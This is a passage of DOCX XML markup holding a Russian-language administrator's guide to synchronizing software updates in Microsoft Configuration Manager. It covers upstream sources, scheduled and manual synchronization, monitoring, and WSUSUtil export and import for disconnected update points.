              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Вышестоящий источник синхронизации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="006B21A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4219"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Сайт центра администрирования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069"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Центр обновления Майкрософт (Интернет)1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Существующий сервер WSUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="006B21A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4219"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Автономный первичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069"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Центр обновления Майкрософт (Интернет)1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Существующий сервер WSUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="006B21A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4219"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Дочерний первичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069"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Сайт центра администрирования</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="006B21A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4219"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Вторичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069"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Родительский первичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Если точка обновления программного обеспечения отсоединена от вышестоящего источника обновления, синхронизацию обновлений программного обеспечения можно выполнить вручную. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Синхронизация обновлений программного обеспечения из подключенной точки обновления программного обеспечения. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как правило, точки обновления программного обеспечения в иерархии Configuration Manager имеют доступ к вышестоящему источнику обновления. В этом сценарии точка обновления программного обеспечения для сайта верхнего уровня будет подключаться к Интернету и выполнять синхронизацию обновлений программного обеспечения из Центра обновления Майкрософт, а затем сайт верхнего уровня отправит запрос на синхронизацию на другие сайты для запуска процесса синхронизации. После получения сайтом запроса синхронизации от сайта верхнего уровня точка обновления программного обеспечения сайта получает метаданные обновлений программного обеспечения из вышестоящего источника обновления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Чтобы выполнить синхронизацию обновлений программного обеспечения, точка обновления программного обеспечения на дочерних первичных сайтах и вторичных сайтах должна быть подключена к вышестоящему источнику синхронизации. Если точка обновления ПО отключена от вышестоящего источника синхронизации, можно использовать функции экспорта и импорта для синхронизации обновлений ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если синхронизация обновлений программного обеспечения запускается по настроенному расписанию, точка обновления на сайте верхнего уровня начинает синхронизацию с Центром обновления Майкрософт в соответствии с запланированной датой и временем. Настраиваемое расписание дает возможность проводить синхронизацию обновлений ПО в дни и часы низкой нагрузки на сервер WSUS, на сервер сайта и на сеть, например, в 2:00 часа ночи один раз в неделю. Во время плановой синхронизации все изменения в метаданных обновлений программного обеспечения, внесенные с момента последней плановой синхронизации, добавляются в базу данных сайта. Сюда входят новые метаданные обновлений программного обеспечения или метаданные, которые были изменены, удалены, либо срок действия которых истек. После синхронизации с вышестоящим источником синхронизации запрос на синхронизацию отправляется во все точки обновления программного обеспечения на дочерних первичных или вторичных сайтах. Запустить синхронизацию обновлений программного обеспечения на сайте верхнего уровня можно также вручную в консоли Configuration Manager в узле Все обновления программного обеспечения в рабочей области Библиотека программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполните следующие процедуры по настройке расписания синхронизации обновлений программного обеспечения или по запуску синхронизации вручную на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка расписания для синхронизации обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли Configuration Manager щелкните Администрирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рабочей области «Администрирование» разверните узел Конфигурация сайта, а затем выберите Сайты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В области результатов выберите сайт центра администрирования или автономный первичный сайт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Главная в группе Параметры разверните узел Настройка компонентов сайта, а затем щелкните Точка обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В диалоговом окне «Свойства компонента точки обновления программного обеспечения» выберите параметр Включить синхронизацию по расписанию, а затем задайте расписание синхронизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запуск синхронизации обновлений программного обеспечения вручную</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли Configuration Manager , подключенной к сайту центра администрирования или автономному первичному сайту, щелкните элемент Библиотека программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рабочей области «Библиотека программного обеспечения» разверните узел Обновления программного обеспечения , а затем щелкните Все обновления программного обеспечения или Группы обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Главная в группе Создать щелкните Синхронизировать обновления программного обеспечения. Чтобы подтвердить запуск процесса синхронизации, в диалоговом окне нажмите кнопку Да .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запущенный в точке обновления программного обеспечения процесс синхронизации можно отслеживать с консоли Configuration Manager для всех точек обновления программного обеспечения в иерархии. Следующая процедура используется для мониторинга процесса синхронизации обновлений программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг процесса синхронизации обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли Configuration Manager щелкните элемент Мониторинг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рабочей области Мониторинг щелкните Состояние синхронизации точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Точки обновления программного обеспечения в иерархии Configuration Manager отображаются в области результатов. В этом представлении можно выполнять мониторинг состояния синхронизации всех точек обновления программного обеспечения. Более </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>подробные сведения о процессе синхронизации можно найти в файле wsyncmgr.log, расположенном в каталоге &lt;путь_установки_Configuration_Manager&gt;\Logs на каждом сервере сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронизация обновлений программного обеспечения из отсоединенной точки обновления программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если точка обновления программного обеспечения для сайта верхнего уровня отключена от Интернета, необходимо воспользоваться функциями экспорта и импорта, представленными в средстве WSUSUtil, чтобы выполнить синхронизацию метаданных обновлений программного обеспечения. Можно выбрать существующие службы WSUS, не входящие в вашу иерархию Configuration Manager , как источник синхронизации. В этом разделе представления информация об использовании функций экспорта и импорта средства WSUSUtil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для экспорта и импорта метаданных обновлений программного обеспечения необходимо экспортировать метаданные обновлений из базы данных WSUS на указанном сервере экспорта, скопировать локально хранящиеся файлы условий лицензионного соглашения в отсоединенную точку обновления программного обеспечения, а затем импортировать метаданные обновлений в базу данных WSUS в отсоединенной точке обновления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения в следующей таблице помогут определить сервер экспорта, с которого следует экспортировать метаданные обновлений программного обеспечения (табл. 4).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 4</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9479" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2269"/>
        <w:gridCol w:w="2839"/>
        <w:gridCol w:w="4371"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1927" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Точка обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2954" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Вышестоящий источник обновления для подключенных точек обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Сервер экспорта для отсоединенной точки обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Сайт центра администрирования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2954"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Центр обновления Майкрософт (Интернет)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Существующий сервер WSUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4598"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Выберите сервер WSUS, синхронизированный с Центром обновления Майкрософт, с использованием классификаций, продуктов и языков обновления программного обеспечения, необходимых в среде Configuration Manager .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1927"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Автономный первичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2954" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Центр обновления Майкрософт (Интернет)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Существующий сервер WSUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Выберите сервер WSUS, синхронизированный с Центром обновления Майкрософт, с использованием классификаций, продуктов и языков обновления программного обеспечения, необходимых в среде Configuration Manager .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед началом процесса экспорта проверьте, что на выбранном сервере экспорта завершена синхронизация обновлений программного обеспечения и самые последние метаданные обновлений программного обеспечения уже синхронизированы. Чтобы убедиться в успешном завершении синхронизации, выполните следующую процедуру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверка успешного завершения синхронизации обновлений программного обеспечения на сервере экспорта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте консоль администрирования WSUS и подключитесь к базе данных WSUS на сервере экспорта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли администрирования WSUS щелкните элемент Синхронизации. В области результатов будет отображен список попыток синхронизации обновлений программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
